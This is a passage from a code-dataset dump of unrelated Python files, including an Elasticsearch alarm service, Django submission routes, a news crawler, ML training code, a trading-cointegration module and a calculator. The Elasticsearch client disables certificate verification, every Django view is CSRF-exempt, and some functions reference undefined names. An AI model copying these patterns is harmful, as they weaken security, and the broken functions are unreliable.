= start + timedelta(hours=2)\n \n\n if bulkbody != '': \n bulkres=es.bulk(bulkbody)\n \n if(not(bulkres[\"errors\"])):\n logger.info(\"BULK done without errors.\")\n else:\n for item in bulkres[\"items\"]:\n if \"error\" in item[\"index\"]:\n logger.info(item[\"index\"][\"error\"])\n \n \n return start\n\n\n\n\n################################################################################\ndef messageReceived(destination,message,headers):\n global es\n logger.info(\"==> \"*10)\n logger.info(\"Message Received %s\" % destination)\n logger.info(message)\n logger.info(\"<== \"*10)\n \n\nlogging.basicConfig(level=logging.INFO,format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\")\nlogger = logging.getLogger()\n\nlshandler=None\n\nif os.environ[\"USE_LOGSTASH\"]==\"true\":\n logger.info (\"Adding logstash appender\")\n lshandler=AsynchronousLogstashHandler(\"logstash\", 5001, database_path='logstash_test.db')\n lshandler.setLevel(logging.ERROR)\n logger.addHandler(lshandler)\n\nhandler = TimedRotatingFileHandler(\"logs/\"+MODULE+\".log\",\n when=\"d\",\n interval=1,\n backupCount=30)\n\nlogFormatter = logging.Formatter('%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s')\nhandler.setFormatter( logFormatter )\nlogger.addHandler(handler)\n\nlogger.info(\"==============================\")\nlogger.info(\"Starting: %s\" % MODULE)\nlogger.info(\"Module: %s\" %(VERSION))\nlogger.info(\"==============================\")\n\n#>> AMQC\nserver={\"ip\":os.environ[\"AMQC_URL\"],\"port\":os.environ[\"AMQC_PORT\"]\n ,\"login\":os.environ[\"AMQC_LOGIN\"],\"password\":os.environ[\"AMQC_PASSWORD\"]}\nlogger.info(server) \nconn=amqstompclient.AMQClient(server\n , {\"name\":MODULE,\"version\":VERSION,\"lifesign\":\"/topic/NYX_MODULE_INFO\"},QUEUE,callback=messageReceived)\n#conn,listener= amqHelper.init_amq_connection(activemq_address, activemq_port, activemq_user,activemq_password, \"RestAPI\",VERSION,messageReceived)\nconnectionparameters={\"conn\":conn}\n\n#>> ELK\nes=None\nlogger.info (os.environ[\"ELK_SSL\"])\n\nif os.environ[\"ELK_SSL\"]==\"true\":\n host_params = {'host':os.environ[\"ELK_URL\"], 'port':int(os.environ[\"ELK_PORT\"]), 'use_ssl':True}\n es = ES([host_params], connection_class=RC, http_auth=(os.environ[\"ELK_LOGIN\"], os.environ[\"ELK_PASSWORD\"]), use_ssl=True ,verify_certs=False)\nelse:\n host_params=\"http://\"+os.environ[\"ELK_URL\"]+\":\"+os.environ[\"ELK_PORT\"]\n es = ES(hosts=[host_params])\n\n\n\nif __name__ == '__main__': \n logger.info(\"AMQC_URL :\"+os.environ[\"AMQC_URL\"])\n\n SECONDSBETWEENCHECKS=120\n es.indices.delete(index='gtc_alarm_cache', ignore=[400, 404]) \n\n nextload=datetime.now()\n\n while True:\n time.sleep(5)\n try: \n variables={\"platform\":\"_/_\".join(platform.uname()),\"icon\":\"list-alt\"}\n \n conn.send_life_sign(variables=variables)\n\n if (datetime.now() > nextload):\n try:\n nextload=datetime.now()+timedelta(seconds=SECONDSBETWEENCHECKS)\n SECONDSBETWEENCHECKS = 60\n START = proceed_computation(START)\n \n except Exception as e2:\n logger.error(\"Error compute alarm Lutosa.\")\n logger.error(e2,exc_info=True)\n \n except Exception as e:\n logger.error(\"Unable to send life sign.\")\n logger.error(e)\n","sub_path":"sources/gtc_compute_alarms_lutosa.py","file_name":"gtc_compute_alarms_lutosa.py","file_ext":"py","file_size_in_byte":12918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281325973","text":"from django.conf.urls import url\n\nfrom submissions.views import SubmissionCreateView, SubmissionMarkView, CriteriaCreateView, \\\n CriteriaListView, CommentCreateView, AssignmentAutomarkingView, SubmissionResultView, SubmissionModifyView, \\\n CommentListView, SubmissionToggleView\nfrom django.views.decorators.csrf import csrf_exempt\n\nurlpatterns = [\n url(r'^create$', csrf_exempt(SubmissionCreateView.as_view()), name='submission-create'),\n url(r'^criteria/create$', csrf_exempt(CriteriaCreateView.as_view()), name='criteria-create'),\n url(r'^criteria/(?P\\d+)$', csrf_exempt(CriteriaListView.as_view()), name='criteria-list'),\n url(r'^comment/create$', csrf_exempt(CommentCreateView.as_view()), name='comment-create'),\n url(r'^comment/(?P\\d+)', csrf_exempt(CommentListView.as_view()), name='comment-list'),\n url(r'^mark/(?P\\d+)/(?P\\d*)?/$', csrf_exempt(SubmissionMarkView.as_view()), name='submission-mark'),\n url(r'^result/(?P\\d+)/(?P\\d*)?/$', csrf_exempt(SubmissionResultView.as_view()), name='submission-result'),\n url(r'^automark/(?P\\d+)$', csrf_exempt(AssignmentAutomarkingView.as_view()), name='automark-assign'),\n url(r'^automark/(?P\\d+)/(?P\\d+)$', csrf_exempt(AssignmentAutomarkingView.as_view()), name='automark-submission'),\n url(r'^modifysubmission', csrf_exempt(SubmissionModifyView.as_view()), name='modify-submission'),\n url(r'^togglesubmission', csrf_exempt(SubmissionToggleView.as_view()), name='toggle-submission'),\n]\n","sub_path":"submissions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584519390","text":"#!/usr/bin/python\n# coding: utf8\n\n\"\"\"\n@author twpDone / twp_zero\n@file pycrawl.py\nParser pour la veille, il parcours les pages et collecte les associations keyword/lien url.\nLe but et de pouvoir afficher les articles pour un mot clé, et d'eviter de lire 20 fois des contenus similaires.\n\n\"\"\"\n\n# import des modules de parsage d'arguments, de fichiers de configuration \n# et la lib url pour le parcours des liens\nimport argparse, ConfigParser, urllib2\n# Classe de parsage\nfrom HTMLParser import HTMLParser\n# Methode pour créer des liens absolus.\nfrom urlparse import urljoin\nimport re\n\n# Nom par defaut du fichier de conf\nCONFIG_FILE=\"crawl.conf\"\n\ndef genConfigFile(cp):\n \"\"\"\n @function genConfigFile\n Genere le fichier de configuration par defaut\n @param cp Objet ConfigParser \n \"\"\"\n global CONFIG_FILE\n \n # Liste des sources\n cp.add_section(\"Seeds\")\n cp.set(\"Seeds\",\"sourcesList\",\"http://www.securityweek.com/cybercrime, https://threatpost.com/\")\n \n # Gestion des mots en liste noire\n cp.add_section(\"Words\")\n cp.set(\"Words\",\"wordBlacklist\",\"all,to,on,cyber,led,more,can,threatpost,how,lab,data,a,not,featured,story,management,that,and,are,be,news,is,it,in,make,the,latest,for,of,or,off,with,us,you,read,security,wrap,cow,as,under,did,list,item,what,tags,let,forum,use,names,so,nor,suits,learn,didnt,write,le,foo,might,day,re,days,uses,one,their,any,also,take,see,article,been,an,say,look,if,via,know,known,some,election,sight,step,run,from,for,your,there,don,but,year,years,tip,at,why,vow,using,by\")\n \n # ouverture et écriture du ficher de conf\n f=open(CONFIG_FILE,\"w\")\n cp.write(f)\n f.close()\n\ndef readConfigFile(cp):\n \"\"\"\n @function readConfigFile\n Lit le fichier de configuration par defaut\n @param cp Objet ConfigParser \n \"\"\"\n global CONFIG_FILE\n cp.read(CONFIG_FILE)\n\ndef getConfigWordsBlackList(cp):\n \"\"\"\n @function getConfigWordsBlackList\n Recupere dans le fichier de config la list des mots blacklistés\n @param cp Objet ConfigParser \n @return List unicode wordBlackList\n @raise Exception Erreur de lecture du fichier\n \"\"\"\n if cp.has_section(\"Words\"):\n try : \n return cp.get(\"Words\",\"wordBlacklist\").decode(\"utf8\",errors=\"replace\").split(\",\")\n except Exception as ex:\n raise ex\n\ndef getConfigSourcesList(cp):\n \"\"\"\n @function getConfigSourcesList\n Recupere dans le fichier de config la list des sites a parser\n @param cp Objet ConfigParser \n @return List unicode sourcesList\n @raise Exception Erreur de lecture du fichier\n \"\"\"\n if cp.has_section(\"Seeds\"):\n try : \n return cp.get(\"Seeds\",\"sourcesList\").decode(\"utf8\",errors=\"replace\").split(\",\")\n except Exception as ex:\n raise ex\n\nfrom NewsParser import *\nfrom Engine import *\nfrom Observer import *\nimport json\n\ndef jsonDump(self):\n return self.__dict__\n\ndef save():\n global eng\n global obs\n f=open(\"register.dump\",\"w\")\n json.dump(obs.register,f)\n f.close()\n f=open(\"links.dump\",\"w\")\n json.dump(eng.links,f)\n f.close()\n\ndef restore():\n global eng\n global obs\n try :\n f=open(\"register.dump\",\"r\")\n obs.setRegister(json.load(f))\n f.close()\n except:\n pass\n try :\n f=open(\"links.dump\",\"r\")\n links=json.load(f)\n obs.seen = links.keys()\n eng.links = links\n f.close()\n except:\n pass\n\ndef crawl():\n global np\n np.crawl()\n### MAIN ###\n\ncp=ConfigParser.ConfigParser()\n#genConfigFile(cp)\nreadConfigFile(cp)\n\nseedsList=getConfigSourcesList(cp)\nblackList=getConfigWordsBlackList(cp)\n\neng=Engine()\neng.setWordBlackList(blackList)\n\nnp=NewsParser(seedsList, engine=eng)\nobs = Observer(eng)\n\nif __name__==\"__main__\":\n restore()\n crawl()\n obs.notify()\n save()\n\n print(\"\\n\\n KeyWords : \")\n eng.printKeyWords(5)\n #eng.listWords()\n print(\"\\n\")\n","sub_path":"pycrawl.py","file_name":"pycrawl.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585420989","text":"from tqdm import tqdm\n\nimport torch\ntry:\n from apex import amp\nexcept ImportError:\n pass\n\n\ndef train_loop(model, loss_func, optimizer, train_dataloader, logger, args, mean, std):\n model.train()\n part_loss = total_loss = 0\n\n for param_group in optimizer.param_groups:\n print(\"Current learning rate: \", param_group['lr'])\n\n for nbatch, data in enumerate(tqdm(train_dataloader)):\n img = data['image']\n img = torch.Tensor(img).cuda()\n img.sub_(mean).div_(std)\n\n ground_truth = data['ground_truth'].cuda()\n\n output = model(img)\n\n loss = loss_func(output, ground_truth)\n total_loss += loss.item()\n part_loss += loss.item()\n\n if (nbatch+1) % (len(train_dataloader) // 10) == 0:\n print(\"Average loss this epoch: {}\".format(part_loss / (len(train_dataloader) // 10)))\n part_loss = 0\n\n optimizer.zero_grad()\n if args.amp:\n with amp.scale_loss(loss, optimizer) as scale_loss:\n scale_loss.backward()\n else:\n loss.backward()\n\n optimizer.step()\n\n # if epoch == 1 and nbatch > len(train_dataloader)/10:\n # break\n\n print(\"Average loss this epoch: {}\".format(total_loss/len(train_dataloader)))\n\n return total_loss/len(train_dataloader)\n\n\ndef load_checkpoint(file_path, model, optimizer=None, scheduler=None):\n \"\"\"\n Load model, optimizer, scheduler and the last epoch from checkpoint\n \"\"\"\n checkpoint = torch.load(file_path, map_location=\"cuda:0\")\n\n model.load_state_dict(checkpoint['model'])\n scheduler.load_state_dict(checkpoint['scheduler'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n start_epoch = checkpoint.get('epoch', 0)\n print('Model loaded successfully')\n\n return model, optimizer, scheduler, start_epoch\n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300453510","text":"from cx_freeze import*\r\nimport sys\r\nbase=None\r\nif sys.platform=='Win32':\r\n base='Win32GUI'\r\nshortcut_table=[('desktopshortcut',\r\n 'desktopFolder',\r\n 'My calculator',\r\n 'TARGETDIR'\r\n ' [TARGETDIR]\\Smartcalculator.exe',\r\n None,\r\n None,\r\n None,\r\n None,\r\n None,\r\n None)]\r\nmsi_data={'shortcut':shortcut_table}\r\nbdist_msi_options={'data':msi_data}\r\n\r\nsetup(\r\n # the actual setup & the definition of other misc. info\r\n name = \"Hello\", # the program name\r\n version = \"0.1\",\r\n description = \"Smart calculator\",\r\n author = \"sahaj\",\r\n author_email = \"sahajdeeep8949@email.com\",\r\n options={\r\n \"build_exe\": msi_data,\r\n \"bdist_msi\": bdist_msi_options,\r\n },\r\n\r\n executables = [\r\n Executable(script='Smartcalculator',\r\n base=base,\r\n icon=None\r\n\r\n\r\n\r\n )\r\n\r\n\r\n\r\n\r\n ]\r\n)\r\n\r\n\r\n\r\n\r\n","sub_path":"SmartcalculatorSet.py","file_name":"SmartcalculatorSet.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"449901899","text":"\"\"\"\nproblem.py\n\"\"\"\nimport ConfigSpace as cs\n\nfrom deephyper.problem import HpProblem\n\nProblem = HpProblem()\n\n# call signature: Problem.add_dim(name, value)\nProblem.add_dim('units1', (1, 64)) # int in range 1-64\nProblem.add_dim('units2', (1, 64)) # int in range 1-64\nProblem.add_dim('dropout1', (0.0, 1.0)) # float in range 0-1\nProblem.add_dim('dropout2', (0.0, 1.0)) \t # float in range 0-1\nProblem.add_dim('batch_size', (5, 500)) \t # int in range 5-500\nProblem.add_dim('log10_learning_rate', (-5.0, 0.0)) # float lr range from 10^-5 to 1\n\n# one of ['relu', ..., ]\nProblem.add_dim('activation', ['relu', 'elu', 'selu', 'tanh'])\n\noptimizer = Problem.add_dim('optimizer', [\n 'Adam', 'RMSprop', 'SGD', 'Nadam', 'Adagrad'\n])\n\n# Only vary momentum if optimizer is SGD\nmomentum = Problem.add_dim(\"momentum\", (0.5, 0.9))\nProblem.add_condition(cs.EqualsCondition(momentum, optimizer, \"SGD\"))\n\n# Add a starting point to try first\nProblem.add_starting_point(\n units1=16,\n units2=32,\n dropout1=0.0,\n dropout2=0.0,\n batch_size=16,\n activation='relu',\n optimizer='SGD',\n log10_learning_rate=-3.0,\n momentum=0.5,\n)\n\n\nif __name__ == \"__main__\":\n print(Problem)\n","sub_path":"03_distributedHyperOpt/01_BasicHPS/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"96988157","text":"\n\nfrom xai.brain.wordbase.nouns._nectarine import _NECTARINE\n\n#calss header\nclass _NECTARINES(_NECTARINE, ):\n\tdef __init__(self,): \n\t\t_NECTARINE.__init__(self)\n\t\tself.name = \"NECTARINES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"nectarine\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_nectarines.py","file_name":"_nectarines.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42207898","text":"__authors__ = \"\"\n__copyright__ = \"(c) 2014, pymal\"\n__license__ = \"BSD License\"\n__contact__ = \"Name Of Current Guardian of this file \"\n\nfrom pymal import exceptions\n\n\nclass Recommendation(object):\n \"\"\"\n Recommendation holds all the data from a recommendation in MAL about an anime.\n\n :ivar recommended_anime: :class:`anime.Anime`\n :ivar recommends: :class:`dict`\n \"\"\"\n def __init__(self, div):\n \"\"\"\n :param div: The dic of the recommendation to parse all the data from it.\n :type div: bs4.element.Tag\n \"\"\"\n from pymal import account, anime\n\n recommended, recommends_divs = div.table.tbody.tr.findAll(name=\"td\", recursive=False)\n\n self.recommended_anime = anime.Anime(int(recommended.div.a[\"href\"].split('/')[2]))\n\n data = recommends_divs.findAll(name=\"div\", recursive=False)\n if 3 == len(data):\n recommends = [data[2]]\n elif 5 == len(data):\n _, _, first_recommend, _, other_recommends = data\n recommends = [first_recommend] + other_recommends.findAll(name=\"div\", recursive=False)\n else:\n raise exceptions.FailedToReloadError( \"Unknown size of data: \" + str(len(data)))\n\n self.recommends = dict()\n\n for recommend in recommends:\n recommend_data, user_data = recommend.findAll(name=\"div\", recursive=False)\n username = user_data.find(name='a', recursive=False)[\"href\"].split('/')[2]\n self.recommends[account.Account(username)] = recommend_data.text\n\n def __repr__(self):\n return \"<{0:s} for {1:s} by {2:d} users>\".format(\n self.__class__.__name__,\n self.recommended_anime,\n len(self.recommends)\n )\n","sub_path":"pymal/inner_objects/recommendation.py","file_name":"recommendation.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10628900","text":"#!/usr/bin/env python\n\"\"\"Python script to create a copy of global configs.\n\nIt's assumed that datasmart project must be importable through `datasmart` (not a submodule)\n\"\"\"\n\nimport shutil\nimport os.path\nimport sys\nfrom datasmart.config.core import __path__ as pkg_to_copy_from_path\nimport pkgutil\n\n\ndef main():\n assert sys.version_info >= (3, 5), \"you must have at least Python 3.5 to run this!\"\n # current_dir = sys.path[0]\n # assert (os.path.isabs(current_dir))\n dir_to_copy_to = os.path.join(os.path.expanduser(\"~\"), \".datasmart\", 'config', 'core')\n if os.path.exists(dir_to_copy_to):\n print(\"old core config file exists! do you want to really remove them and use default ones?\")\n answer = input(\"type y to confirm, otherwise the program will exit\")\n if answer == 'y':\n shutil.rmtree(dir_to_copy_to)\n else:\n return\n core_pkgs_to_copy_names = [x[1] for x in pkgutil.iter_modules(pkg_to_copy_from_path)]\n print(core_pkgs_to_copy_names)\n core_pkgs_to_copy_filecontent = []\n # for each one, copy its config.json\n print('in total {} packages to work on.'.format(len(core_pkgs_to_copy_names)))\n for pkg in core_pkgs_to_copy_names:\n # read out the content of config file.\n pkg_full = 'datasmart.config.core.' + pkg\n content_this = pkgutil.get_data(pkg_full, 'config.json')\n assert content_this is not None, \"config file for {} does not exist!\".format(pkg_full)\n core_pkgs_to_copy_filecontent.append(content_this)\n\n assert not os.path.exists(dir_to_copy_to)\n os.makedirs(dir_to_copy_to) # create all intermediate ones if necessary.\n\n for idx, (pkg, content) in enumerate(zip(core_pkgs_to_copy_names, core_pkgs_to_copy_filecontent), start=1):\n pkg_dir = os.path.join(dir_to_copy_to, pkg)\n pkg_config_path = os.path.join(pkg_dir, 'config.json')\n os.mkdir(pkg_dir)\n with open(pkg_config_path, 'wb') as f_this:\n f_this.write(content)\n print('{}/{}: {} done'.format(idx, len(core_pkgs_to_copy_names), pkg))\n\n print(\"done!\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"install_config_core.py","file_name":"install_config_core.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40058800","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'alex barnes'\n\n\nclass Plugboard(object):\n\n def __init__(self, wires = \"\"):\n if (len(wires) % 2 != 0) or (wires.isalpha() is False) or (len(wires) > 20) or (len(wires) < 2):\n raise ValueError('Must input an even number of up to 20 alpha characters.')\n else:\n self.pairKey = {}\n self.populate_key(wires)\n\n def populate_key(self, pairs):\n self.pairKey = {}\n pairsList = list(pairs)\n while len(pairsList) > 0:\n k = pairsList.pop(0)\n v = pairsList.pop(0)\n self.wire(k, v)\n\n def wire(self, k, v):\n k = k.upper()\n v = v.upper()\n self.pairKey[k] = v\n self.pairKey[v] = k\n\n def process(self, letter):\n try:\n return self.pairKey[letter[0].upper()]\n except KeyError:\n return letter\n\nif __name__ == \"__main__\":\n plugboard = Plugboard(\"ABCDEFGHIJKLMNOPQRST\")\n assert plugboard.process(\"A\") == \"B\"\n assert plugboard.process(\"B\") == \"A\"\n assert plugboard.process(\"X\") == \"X\"\n assert plugboard.process(\".\") == \".\"\n","sub_path":"plugboard.py","file_name":"plugboard.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"173163654","text":"#%%\nimport numpy as np \nimport pandas as pd \nimport os\nimport datetime\nimport matplotlib.pyplot as plt\nimport statsmodels.tsa.stattools as ts\nimport statsmodels.api as sm\nimport itertools\nimport timeit\nfrom sklearn.linear_model import LinearRegression\nfrom helpers import *\n#%%\ndef find_integrated(df, confidence=0.05):\n \"\"\"Uses ADF test to decide I(1) as in the first step of AEG test. \n Takes the data from preprocess and filters out stationary series,\n returning data in the same format. \n DF Test has unit root as null\"\"\"\n pairs = df.index.unique(0)\n integrated = []\n for pair in pairs:\n df.loc[pair, 'logReturns']=(np.log(df.loc[pair, 'Close'])-np.log(df.loc[pair,'Close'].shift(1))).values\n df.loc[pair, 'logClose'] = np.log(df.loc[pair, 'Close'].values)\n pvalue=ts.adfuller(df.loc[pair, 'logClose'].fillna(method='ffill').values)[1]\n if pvalue >= confidence:\n integrated.append(pair)\n return df.loc[integrated]\n\ndef cointegration(df, confidence=0.05):\n pairs = df.index.unique(0)\n cointegrated = []\n for pair in itertools.combinations(pairs,2):\n x = df.loc[pair[0], 'logClose'].fillna(method='ffill').values\n x=x.reshape((x.shape[0], 1))\n y = df.loc[pair[1], 'logClose'].fillna(method='ffill').values\n y=y.reshape((y.shape[0], 1))\n if ts.coint(x,y)[1]<= confidence:\n model = sm.OLS(y,sm.add_constant(x))\n results = model.fit()\n #the model is like \"second(logClose) - coef*first(logClose) = mean(logClose)+epsilon\" in the pair\n cointegrated.append([pair, results.params])\n return cointegrated\n\ndef coint_spread(df, viable_pairs, timeframe, betas=1):\n \"\"\"Picks out the viable pairs of the original df (which has all pairs)\n and adds to it the normPrice Spread among others, as well as initially\n defines Weights and Profit \"\"\"\n spreads = []\n if betas == 1:\n betas = [np.array([1,1]) for i in range(len(viable_pairs))]\n for pair, coefs in zip(viable_pairs, betas):\n #labels will be IOTAADA rather that IOTABTCADABTC, \n #so we remove the last three characters\n first = pair[0][:-3]\n second = pair[1][:-3]\n composed = first+'x'+second\n multiindex = pd.MultiIndex.from_product([[composed], df.loc[pair[0]].index],names = ['Pair', 'Time'])\n newdf = pd.DataFrame(index = multiindex)\n newdf['1Weights']=None\n newdf['2Weights']=None\n newdf['Profit'] = 0\n #newdf['normLogReturns']= sliced_norm (df, pair, 'logReturns', timeframe)\n newdf['1Price']=df.loc[pair[0], 'Price'].values\n newdf['2Price']=df.loc[pair[1], 'Price'].values\n newdf['1logClose']=df.loc[pair[0], 'logClose'].values\n newdf['2logClose']=df.loc[pair[1], 'logClose'].values\n newdf['Spread'] = newdf['2logClose']-newdf['1logClose']*coefs[1]\n newdf['SpreadBeta']=coefs[1]\n newdf['normSpread']=((newdf['Spread']-pick_range(newdf, *timeframe)['Spread'].mean())/pick_range(newdf, *timeframe)['Spread'].std()).values\n #not sure what those lines do\n first = df.loc[pair[0]]\n first.columns = [\"1\"+x for x in first.columns]\n second = df.loc[pair[0]]\n second.columns = [\"2\"+x for x in second.columns]\n reindexed = (pd.concat([first,second], axis=1)).set_index(multiindex)\n \n #normPriceOld = reindexed.normPrice\n #reindexed.loc[:,'normPrice'] = (reindexed.loc[:,'normPrice']-reindexed.loc[:,'normPrice'].mean())/reindexed.loc[:,'normPrice'].std()\n #possible deletion of useless columns to save memory.. \n # but maybe should be done earlier? Only normPrice \n # should be relevant since its the spread at this point\n # reindexed.drop(['Volume', 'Close', 'Returns'], axis = 1)\n #reindexed['normPriceOld'] = normPriceOld\n spreads.append(newdf)\n return pd.concat(spreads)\n\ndef coint_profit(df, beta=1.5):\n \"\"\" Calculates the per-period profits\n Returns a Multi-Indexed one column DF with Profit\"\"\"\n \n return first-second\n#%%\n\n#%%\n\n\n#%%\n","sub_path":"cointmethod.py","file_name":"cointmethod.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343410783","text":"#Basic calculator program using Python\n#Create by Guilherme Sanches Tambelini\n#Version 1.0\n\nimport datetime\n\n#Funções Não funcionais\ndef escreveLog(texto):\n\tlog = \"C:\\\\Alpha\\\\Algoritimos\\\\Python\\\\Calculadora\\\\Log-Calculator.txt\"\n\ttry:\n\t fp = open(log)\n\texcept IOError:\n\t #Se nao existir, criar o arquivo\n\t fp = open(log, 'w+')\n\tlog = open(log, \"a\")\n\tlog.write(str(datetime.datetime.now()) + \" - \" + texto)\n\tlog.write(\"\\n\")\n\tlog.close()\n\ndef escreveTextoResultado(texto):\n\tprint(\"\\n\")\n\tprint(texto)\n\tprint(\"\\n\")\n\t\nescreveLog(\"Início\")\ncontinua = \"s\"\n\nprint(\"\\n******************* Python Calculator *******************\")\nwhile (continua == \"s\"):\n\tprint(\"\\nSelecione o número da operação desejada: \\n\")\n\tprint(\"1 - Soma\")\n\tprint(\"2 - Subtração\")\n\tprint(\"3 - Multiplicação\")\n\tprint(\"4 - Divisão\")\n\tprint(\"5 - Potencia\")\n\t\n\twhile True:\n\t\ttry:\n\t\t\tescolha = int(input(\"\\nDigite sua opção (1/2/3/4/5): \"))\n\t\t\tescreveLog(str(\"opção escolhida: \" + str(escolha))) #log\n\t\t\tbreak\n\t\texcept ValueError as e1:\n\t\t\tprint(\"\\nOpção Inválida!\")\n\t\t\tescreveLog(\"Opção Inválida!\")\n\t\t\tescreveLog(str(e1))\n\t\texcept Exception as e2:\n\t\t\tprint(\"\\nOpção Inválida!\")\n\t\t\tescreveLog(\"Opção Inválida!\")\n\t\t\tescreveLog(str(e2))\n\n\tif (escolha == 1) or (escolha == 2) or (escolha == 3) or (escolha == 4):\n\t\ttexto = input(\"\\nDigite o primeiro número: \")\n\t\ttry:\n\t\t\tnum1 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\n\t\ttexto = input(\"\\nDigite o segundo número: \")\n\t\ttry:\n\t\t\tnum2 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\t\n\tif (escolha == 5):\n\t\ttexto = input(\"\\nDigite a base: \")\n\t\ttry:\n\t\t\tnum1 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\n\t\ttexto = input(\"\\nDigite o expoente: \")\n\t\ttry:\n\t\t\tnum2 = int(texto)\n\t\texcept ValueError:\n\t\t\tprint(\"\\nValor Inválido: \" + texto)\n\t\t\tcontinue\n\n\tif (escolha == 1):\n\t\tresultado = (lambda x,y: x + y) (num1, num2)\n\t\tescreveTextoResultado(str(num1) + \"+\" + str(num2) + \"=\" + str(resultado))\n\t\tescreveLog(str(num1) + \"+\" + str(num2) + \"=\" + str(resultado))\n\t\n\telif (escolha == 2):\n\t\tresultado = (lambda x,y: x - y) (num1, num2)\n\t\tescreveTextoResultado(str(num1) + \"-\" + str(num2) + \"=\" + str(resultado))\n\t\tescreveLog(str(num1) + \"-\" + str(num2) + \"=\" + str(resultado))\n\t\n\telif (escolha == 3):\n\t\tresultado = (lambda x,y: x * y) (num1, num2)\n\t\tescreveTextoResultado(str(num1) + \"*\" + str(num2) + \"=\" + str(resultado))\n\t\tescreveLog(str(num1) + \"*\" + str(num2) + \"=\" + str(resultado))\n\t\n\telif (escolha == 4):\n\t\ttry:\n\t\t\tresultado = (lambda x,y: x / y) (num1, num2)\n\t\t\tescreveTextoResultado(str(num1) + \"/\" + str(num2) + \"=\" + str(resultado))\n\t\t\tescreveLog(str(num1) + \"/\" + str(num2) + \"=\" + str(resultado))\n\t\texcept ZeroDivisionError as e:\n\t\t\tescreveTextoResultado(\"Divisao por zero\")\n\t\t\tescreveLog(\"Exception ZeroDivisionError:Divisao por zero - \" + str(num1) + \"/\" + str(num2))\n\t\t\tescreveLog(str(e))\n\t\n\telif (escolha == 5):\n\t\tresultado = str(potencia(num1, num2))\n\t\tescreveTextoResultado(str(num1) + \" elevado a \" + str(num2) + \" = \" + str(resultado))\n\t\tescreveLog(str(num1) + \" elevado a \" + str(num2) + \" = \" + str(resultado))\n\telse:\n\t\tescreveTextoResultado(\"Opção Inválida!\")\n\t\tescreveLog(\"Opção Inválida: \" + str(escolha))\n\t\n\tcontinua = str(input(\"\\nDeseja continuar? Opções [s/n]: \"))\n\nelse:\n\tescreveTextoResultado(\"Fim\")\n\tescreveLog(\"Fim\")","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309348428","text":"import requests\nimport json\ndata_url = 'http://www.compjour.org/files/code/json-examples/nyt-books-bestsellers-hardcover-fiction.json'\ndata = json.loads(requests.get(data_url).text)\nbooks = data['results']['books']\n\nscribner_books=[b for b in books if b['publisher'] == \"Scribner\"]\nprint(\"A.\", len(scribner_books))\n\ndetective_books=[b for b in books if 'detective' in b['description'].lower()]\nprint(\"B.\", len(detective_books))\n\nfrom operator import itemgetter\nx = max(books, key = itemgetter('weeks_on_list'))\ns = \"|\".join([x['title'], str(x['weeks_on_list'])])\nprint(\"C.\", s)\n\n\nx = max(books, key = itemgetter('rank_last_week'))\ns = \"|\".join([x['title'], str(x['rank']), str(x['rank_last_week'])])\nprint(\"D.\", s)\n\n\nnew_books=[b for b in books if b['rank_last_week'] == 0]\nprint(\"E.\", len(new_books))\n\n\nx = min(new_books, key = itemgetter('rank'))\ns = \"|\".join([x['title'], str(x['rank'])])\nprint(\"F.\", s)\n\n\ndef calc_rank_change(book_obj):\n return book_obj[\"rank_last_week\"] - book_obj[\"rank\"]\n\nbooks_ranked_last_week = [b for b in books if b['rank_last_week'] > 0]\nx = max(books_ranked_last_week, key = calc_rank_change)\ns = \"|\".join([x['title'], str(x['rank']), str(calc_rank_change(x))])\nprint(\"G.\", s)\n\n\nx = min(books_ranked_last_week, key = calc_rank_change)\ns = \"|\".join([x['title'], str(x['rank']), str(calc_rank_change(x))])\nprint(\"H.\", s)\n\n\nchanges = [calc_rank_change(b) for b in books_ranked_last_week]\nx = [v for v in changes if v > 0]\ns = sum(x)\nprint(\"I.\", s)\n\n\nx = [v for v in changes if v < 0]\ns = \"|\".join([str(len(x)), str(sum(x))])\nprint(\"J.\", s)\n\n\nprint('K.', max([len(b['title']) for b in 